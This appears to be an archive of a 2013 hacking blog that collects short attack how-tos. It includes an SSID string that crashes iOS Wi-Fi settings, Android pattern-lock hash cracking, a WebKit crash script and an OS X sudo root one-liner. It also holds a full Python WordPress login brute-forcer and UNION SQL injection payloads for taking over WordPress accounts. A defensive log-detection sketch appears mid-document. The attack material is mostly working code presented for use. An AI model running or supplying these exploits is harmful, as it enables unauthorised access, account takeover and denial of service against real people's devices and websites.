Aug 30, 2013

Howto: DoS iOS with SSIDs

It works: I can't open Settings -> Wi-Fi, but when I turn off this SSID everything goes back to normal. Please try it at your own risk.

root@kali:~# airmon-ng start wlan0
root@kali:~# airbase-ng -e " ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ" -q -c 11 mon0


Source: http://pastebin.com/Ax7FTpRN



Howto: Cracking the Pattern Lock Protection

For full details, see the Source.

Requirement
- Rooted Android device

1. Go to /data/system
2. Read the file gesture.key with a hex editor. At the end of the file you will find a value like "2C3422D33FB9DD9CDE87657408E48F4E635713CB"

3. Use SQLite Browser to look the hash up in the RainbowTable table:
SELECT * FROM RainbowTable WHERE hash = '2c3422d33fb9dd9cde87657408e48f4e635713cb';

Source: http://resources.infosecinstitute.com/android-forensics-cracking-the-pattern-lock-protection/


Howto: WebKit Crasher by Superevr [Affects iOS/OSX]

WebKit (Safari) will crash if it reads these Arabic characters in any webpage. The problem is in the Apple CoreText font rendering framework. If you want to try it, use:

<script>
var n=String.fromCharCode(1582,32,823,816,784,1582);
document.getElementById("demo").innerHTML=n;

</script>

Source: https://news.ycombinator.com/item?id=6293824
 


Aug 29, 2013

Howto: Get Root on OSX, by Superevr

Get root on OS X:

sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su




Tools: WordPress Bruteforce version 2, by D35m0nd142

    #!/usr/bin/python
    # WordPress Login Brute Forcer (without WPscan)
    # Sends curl requests to find the login password: if the login fails, curl writes an output file; otherwise no output is generated :)
    # Author: D35m0nd142
     
    import os,sys,time,urllib2
    from termcolor import colored
    os.system("rm wpbrute_output.html")
    os.system("rm dir_list.txt")
    os.system("clear")
     
    try:
            target = sys.argv[1]
            username = sys.argv[2]
            wlist = sys.argv[3]
     
    except:
            time.sleep(0.6)
            print colored("\nWordpress Login Brute Forcer","green")
            print colored("By:","green"),"D35m0nd142\n"
            time.sleep(1)
            print "Usage: python wpbrute.py <target> <username> <wordlist> <proxy>\n"
            print "Example1: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt"
            print "Example2: python wpbrute.py http://www.mywebsite.com/ admin wordlist.txt '127.0.0.1:9050'\n"
            sys.exit(1)    
     
    try:
            proxy = sys.argv[4]
    except:
            proxy = "no"
     
    if "http://" not in target:
            target = "http://%s" %target
     
    print colored("\nWordpress Login Brute Forcer","green")
    print colored("By:","green"),"D35m0nd142"
    time.sleep(1)
    print "\n ... Calculating number of words in '%s' ... " %wlist
    time.sleep(1.3)
     
    words = open(sys.argv[3],"r").readlines()
     
    time.sleep(0.8)
     
    print colored("\n[+] Loaded ","green"), len(words),colored(" passwords from ","green"),"%s" %wlist, colored(" for testing....","green")  
    time.sleep(1.3)
     
    if proxy != "no":
            print colored("[+] Loaded proxy => ","green"),"%s" %proxy
     
    else:
            print "\n"
     
    time.sleep(1.1)
    print "\n ... Bruteforcing Wordpress login ... \n"
    time.sleep(1.5)
     
     
    for word in words:
            word = word.replace('\r','').replace('\n','')
     
           
            print colored(".. Attempting =>","yellow")," '%s:%s' " %(username,word)
     
            if proxy != "no":
                    curl = "curl -s --socks5 %s --url '%s/wp-login.php' -A 'Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(proxy,target,username,word,target)
           
            else:
                    curl = "curl -s --url '%s/wp-login.php' -A 'Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)' --data 'log=%s&pwd=%s&wp-submit=Login&redirect_to=%s/wp-admin/&testcookie=1' -o wpbrute_output.html" %(target,username,word,target)
     
            ls = "ls -l > dir_list.txt"
     
            os.system(curl)
            os.system(ls)
     
            cfile = open("dir_list.txt","r")
            cfile_read = cfile.read()
            cfile.close()
     
            if "wpbrute_output.html" in cfile_read:
                    #print "\n_________________________________________"
                    #print ".. Login not bruteforced :( "
                    ofile = open("wpbrute_output.html","r")
                    ofile_read = ofile.read()
                    ofile.close()
                    os.system("rm wpbrute_output.html")
     
                    if "Invalid username" in ofile_read or ("Nome de usu" in ofile_read and "inv" in ofile_read and "lido." in ofile_read) or "Nome utente non valido" in ofile_read:
                            print colored(".. Invalid username!\n","blue")
                            sys.exit(1)
                            #print "________________________________________\n"
     
            else:
                    print colored("\n[+] - Successfully Authentication!","red")
                    print colored("Host:","green"),"%s" %target
                    print colored("User:","green"),"%s" %username
                    print colored("Pass:","green"),"%s" %word
                    sys.exit(1)
 
 
 
Source: http://pastebin.com/f4CaEVRa
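
Seen from the server side, the script above leaves a burst of POST requests to /wp-login.php from one address. The following detection sketch is an added example, not part of the original post or of D35m0nd142's tool; it assumes access logs in "combined" format and default WordPress behaviour (200 for a failed login, 302 for a successful one), and the function name, threshold, window and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample in "combined" log format (documentation IPs, not real traffic).
# The User-Agent is the one the script sends when no proxy is given.
def _line(ip, sec, status, method="POST", path="/wp-login.php"):
    return ('%s - - [29/Aug/2013:10:00:%02d +0000] "%s %s HTTP/1.1" %d 512 "-" '
            '"Mozilla/2.0 (compatible; MSIE 6.0; Windows NT 5.2)"'
            % (ip, sec, method, path, status))

SAMPLE_LOG = (
    [_line("203.0.113.7", s, 200) for s in range(1, 9)]       # 8 failed guesses
    + [_line("203.0.113.7", 9, 302)]                           # then a redirect
    + [_line("198.51.100.4", 5, 200), _line("198.51.100.4", 40, 302)]  # typo, then login
    + [_line("192.0.2.10", 12, 200, "GET")]                    # only viewing the form
)

def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"burst": n, "login_after_burst": bool}} for every IP that
    sent at least `threshold` POSTs to wp-login.php inside one sliding window."""
    recent = defaultdict(deque)    # ip -> timestamps still inside the window
    flagged = {}
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m:
            continue               # not a combined-format line
        ip, ts, method, path, status = m.groups()
        if method != "POST" or path.split("?")[0] != "/wp-login.php":
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:
            q.popleft()            # drop attempts older than the window
        if len(q) >= threshold:
            entry = flagged.setdefault(ip, {"burst": 0, "login_after_burst": False})
            entry["burst"] = max(entry["burst"], len(q))
        # A 302 from an already-flagged IP suggests a guess finally succeeded.
        if ip in flagged and status == "302":
            flagged[ip]["login_after_burst"] = True
    return flagged

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

An IP reported with login_after_burst set is the case to triage first: force a password reset for the targeted account and review what that session did.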




Aug 28, 2013

Tools: Wi-fEye Wireless Pentesting Tool 1.0 Beta

Wi-fEye is designed to help with network penetration testing. It allows the user to perform a number of powerful attacks automatically, including WEP/WPA cracking, session hijacking and more.

Source: http://packetstormsecurity.com/files/122960


Tools: Linux Exploit Suggester - Local Exploit - Privilege Escalation

The hackers uploaded numerous exploits and scripts in an attempt to compromise a Linux RedHat server. Among these files was a broken script (that did not work) that would suggest possible exploits given the release version ‘uname -r’ of the Linux operating system.

Source: https://github.com/PenturaLabs/Linux_Exploit_Suggester



Tools: Bypass sudo in Mac OSX

This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command.

Source: http://packetstormsecurity.com/files/122965



Howto: Get webpage without wget and curl (By Brute Logic)

When you don't have wget or curl:
root@Hacking:~$ whois -h http://www.victim.com -p80 GET /




Aug 25, 2013

Howto: Reset Password Wordpress With SQL Injection

1. Exploit SQL injection in a WordPress plugin
-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users
 
2. Reset any user you want
http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}
 
3. Get the activation code
-1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users 

4. Insert the activation code and reset the password :)


Source: http://www.flippercode.com/how-to-hack-wordpress-site-using-sql-injection

 



Papers: SSL/TLS Explanation

Best SSL/TLS explanation :)

https://www.sans.org/reading-room/whitepapers/authentication/ssl-tls-whats-hood-34297


https://dl.dropboxusercontent.com/u/2330423/ssl%3Atls.pdf

